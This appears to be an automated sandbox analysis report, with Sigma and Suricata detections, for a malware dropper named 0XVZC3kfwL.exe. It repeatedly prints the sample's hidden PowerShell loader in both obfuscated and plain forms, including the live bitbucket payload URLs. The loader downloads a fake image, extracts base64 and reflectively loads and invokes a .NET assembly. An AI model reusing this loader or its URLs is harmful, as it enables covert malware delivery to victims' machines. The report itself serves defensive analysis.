Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\0XVZC3kfwL.exe, ProcessId: 3832, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-02T19:04:55.491964+020028033053Unknown Traffic192.168.2.849705185.166.143.49443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: 0XVZC3kfwL.exeAvira: detected
        Multi AV Scanner detection for submitted file
        Source: 0XVZC3kfwL.exeReversingLabs: Detection: 42%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.6% probability
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C23214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF681C23214
        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.8:49704 version: TLS 1.2
        Source: 0XVZC3kfwL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: 0XVZC3kfwL.exe
        Source: Binary string: wextract.pdbGCTL source: 0XVZC3kfwL.exe
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.1545872221.000001EEDDF60000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP@{ source: powershell.exe, 00000005.00000002.1545597457.000001EEDDF1A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbbert\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSI:Syf source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C22034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF681C22034
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1Host: bitbucket.org
        Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
